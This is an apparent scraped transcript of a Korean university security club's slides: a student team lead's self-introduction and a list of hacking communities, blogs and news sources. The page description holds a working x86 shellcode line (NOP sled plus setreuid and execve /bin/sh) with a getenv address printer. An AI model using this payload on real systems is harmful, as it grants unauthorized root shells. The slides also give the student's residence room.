team os kernel development
DESCRIPTION
int main( void ) { char *p = getenv("HK"); printf( "%p\n" , p ); } export HK=`perl -e 'print "\x90"x512,"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80","\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` - PowerPoint PPT PresentationTRANSCRIPT
Team OS Kernel Develop-ment
09 최민준 idkwim.tistory.comidkwim.linknow.kr
2
말하고자 하는 것
팀장이 누군지 알아보자 !!
뭐하는 팀이지 ??
문제풀이는 X
추가발표 ;;
3
내가 누구요
• 중 3 > 친구가 C 언어 하자고 해서 공부함
• 학원 때려 치고 시험공부도 안하고 C 언어 ㄱㄱ
• 한국애니메이션고등학교 게임제작과 탈락ㅠ . ㅠ
• 고 1 > 공부를 못해서 실업계에 갔음 ( 천안정보고 )
• 적성을 살리기 위해 전산부 ( 컴퓨터동아리 ) 에 들어갔음
• 타자치고 오피스랑 비베 배우고 청소하고 맞고 등등…
• 고 2 > 서버와 네트워크를 공부함 (10 전재율도 만남… )
• 지방기능경기대회 컴퓨터정보통신 3 위 했음ㅠㅠ
4
내가 누구요 ( 계속 )
• 대덕대학 네트워크 경진대회 1 등 했음 with 창진
• 고 3 >11 이창진이 들어옴 내가 가르쳤음 ^00^
• 진학에 대해 고민하기 시작함 , 해킹대회 관련 뉴스를 봄
• 순천향대에 SF 가 있다고 함 , 성적은 괜츈 갈만했음 !!
• 정보보호페스티벌 참가 암것도 몰라서 2~3 문제 풀고 14 등
• 대 1 > 순천향대 입학 , SF 지원 -> 신입선발대회 신입생 1 등
• 대 2 >SF 부회장 , SF 내부해킹대회 1 위 , 파도콘 발표
• 대 3 >OS Kernel 팀장 , 군 문제와 어학연수 문제로 고민 중
5
신상명세서
• 명칭 : 최민준
• 연령 : 90 년생 , 09 학번 , 3 학년
• 서식지 : 동구오피스텔 특실 204 호
• 블로그 : idkwim.tistory.com
• 프로필 : idkwim.linknow.kr
• 네이트 : [email protected]
• 취약점 : 미필 ㅠㅠㅠㅠ
6
무슨 팀이오 ...?
Hacking is…
7
뭘 한단 말이오 ㅡㅡ ^
H/D
Ker nel
App / Shell
User
여기 !!!
8
무엇이 필요하오 ?
• C 언어
• 어셈블리 언어
• 운영체제론
• 성실함 , 끈기 , 열정 등 뻔한거…
9
원하는게 뭐요 ?
Hack the planet !!!
좋은 해커가 되기 위한 좋은 습관
09 최민준 idkwim.tistory.comidkwim.linknow.kr
11
해커의 습관 ?
12
1. 정보력이 생명이다 !
정보가 몰려오고 있어 !!빨리 공부 하러 가자 ㅠㅠ
13
어디로 가면 얻을 수 있소 !?
• 해킹 관련 커뮤니티 사이트
• 국내외 동향 사이트
• 해커들의 블로그
• 트위터 & 페이스북
• 보안관련 뉴스
14
해킹 커뮤니티
• beist.org
– 국내 최고의 해커그룹 중 하나
– 국내외 해커 , 해킹 동향
– 다양한 해킹 문서 보유
– 디씨에 버금가는 잉여력도 맛볼 수 있음
15
해킹 커뮤니티 목록
• 해커스쿨 hackerschool.org
• 와우해커 wowhacker.org
• 쿠시스 kucis.org
• 파도콘 padocon.org
• 코드게이트 http://community.codegate.org
16
국내 동향 사이트
• www.nchovy.kr
– 국내외 해킹동향 수집 & 정리
– 이슈 , 블로그 , 기술문서 등
– 초보자도 쉽게 동향 파악 가능
17
국내외 동향 사이트 목록
• 안철수연구소 http://www.ahnlab.com
• 울타리 http://ultari.hackerschool.org
• 인터넷침해대응센터 http://www.krcert.or.kr
• 알약보안센터 http://alyac.altools.co.kr/SecurityCenter
• SANS http://isc.sans.edu
• 패킷스톰 http://packetstormsecurity.org
• 익스플로잇 DB http://www.exploit-db.com/
18
해커들의 블로그
• hkpco.kr
– 국내 고수해커 박찬암 블로그
– 에세이 , 기술문서 , 문제풀이 등
– 여러 자료와 동향 등을 얻을 수 있음
– 워게임 등 기타 서비스 제공
19
해커들의 블로그 목록
• 이승진 (biest) http://beist.tistory.com
• 구사무엘 (dual) http://dualpage.muz.ro
• 김승연 (acuros) http://acuros.pe.kr
• 박지훈 (ezbeat) http://ezbeat.tistory.com
• 심준보 (passket) http://passket.tistory.com
• 마플 (maple) http://kese111.tistory.com
• 박세준 (cai) http://www.risio.net/tc/
• 최민준 (idkwim) http://idkwim.tistory.com
20
트위터
• 국내외 많은 해커들이 트위터 이용
• 가장 빠르게 보안 이슈를 알 수 있음
• 해커들과의 커뮤니티가 쉬운 장점
• 해커들을 팔로잉 ~ 하자 !
21
해커들의 트위터
http://twitter.com/hdmoore metasploit 의 주인장 HD Moore. 최신 보안 정보
http://twitter.com/dinodaizovi 엘리트 해커 Dino Dai Zovi. Mac OSX 의 전문 해커
http://twitter.com/alexsotirov l33t 해커 중에 한명인 Alexander Sotirov. 최신 Exploit 테크닉 선도
http://twitter.com/thedarktangent 세계에서 가장 유명한 보안 컨퍼런스인 Defcon 의 주인장 Jeff Moss
http://twitter.com/spendergrsec Linux 에서 0-day( 취약점 ) 을 찾는 실력특출
http://twitter.com/i0n1c 한국을 좋아하는 독일 해커 Stefan Esser. PHP 보안 리서처입니다 .
http://twitter.com/dguido Dan Guido, 주로 뉴욕에서 활동
http://twitter.com/s7ephen CCSAW2009 대회에서 문제를 출제한 s7ephen
http://twitter.com/invisig0th Kenshoto 의 Invisigoth. Kenshoto 는 몇 년 동안 최고의 해킹 대회인 Defcon CTF
문제를 출제
http://twitter.com/daveaitel 프로그래밍도 잘하고 해킹도 잘하는 것으로 유명한 Dave Aitel. Immunity 사
http://twitter.com/mdowd Mark Dowd. 소스 코드 Auditing 으로 취약점을 찾는 능력이 가장 뛰어난 사람 중 한 명
http://twitter.com/kleissner BlackHat 에서 발표를 한 1992 년생 Kleissner. Bios 단의 해킹까지 연구
http://twitter.com/dugsong 한국계 해커인 dugsong. 한국계 해커 중에서는 가장 유명한 해커
http://twitter.com/jeremiahg 웹 쪽으로 다양한 취약점을 발표하고 있는 해커 . 특히 Ajax 와 관련
http://twitter.com/halvarflake 유명한 회사인 Zynamics 의 Halvar Flake. 수학적인 지식이 풍부하고 그걸 활용한 프로그래밍을 잘함 http://twitter.com/0xcharlie Mac hacker's handbook 을 쓴 Charlie Miller. SMS 를 보내기만 하면 아이폰이 해킹되는 심각한 취 약성 발표 . Finding bugs and Exploiting it 모두 뛰어난 사람
22
보안관련 뉴스
• http://www.boannews.com
– IT & 보안관련 뉴스 홈페이지
– 다양한 이슈와 사건 , 컬럼 제공
– 뉴스를 통해 동향 확인 가능
23
2. RSS (Rich Site Summary)
• 웹상의 정보를 프로그램을 통해 한번에 볼 수 있는 서비스
• 매번 로그인하거나 직접 방문하지 않고 동향 확인
• 프로그램에 RSS 주소를 등록하면 확인 가능
• 구글 리더 , MS 아웃룩 , FeedDemon, GreatNews 등
24
예제 ) 구글리더에 시큐홈피 추가하기
25
예제 ) 구글리더에 시큐홈피 추가하기
26
예제 ) 구글리더에 시큐홈피 추가하기
27
예제 ) 구글리더에 시큐홈피 추가하기
28
예제 ) 구글리더에 시큐홈피 추가하기
29
3. 메일링 리스트
• 버그트럭 (bugtruck)
– 메일을 통해서 보안관련 정보를 주고 받음
– 가입만 하면 최신 이슈를 메일로 받아볼 수 있음
– 커뮤니티가 활성화 되어있어 모임도 자주함
– 해커들과의 질문 &답변이 가능함
– 스마트폰이 있다면 어디서나 확인 가능
– http://groups.google.com/group/bugtruck
30
버그트럭 메일링
31
이걸 언제 다 확인하오 ㅠㅠ ?
iGoogle !!!!!!!!!!!!!!!!!!!!!!
32
결론
• OS Kernel 팀은 시스템의 근본을 공부하는 팀
• 팀원은 적었으면 좋겠음 ㅠ . ㅠ
• 좋은 해커는 동향파악이 필수
• 홈페이지 , 블로그 , 트위터 , 메일링 , 뉴스 등
• iGoogle!!!!!!!!!!!! Smart Phone!!!!!!!!!!!!!!
33
묻고 싶은 것이 있소 !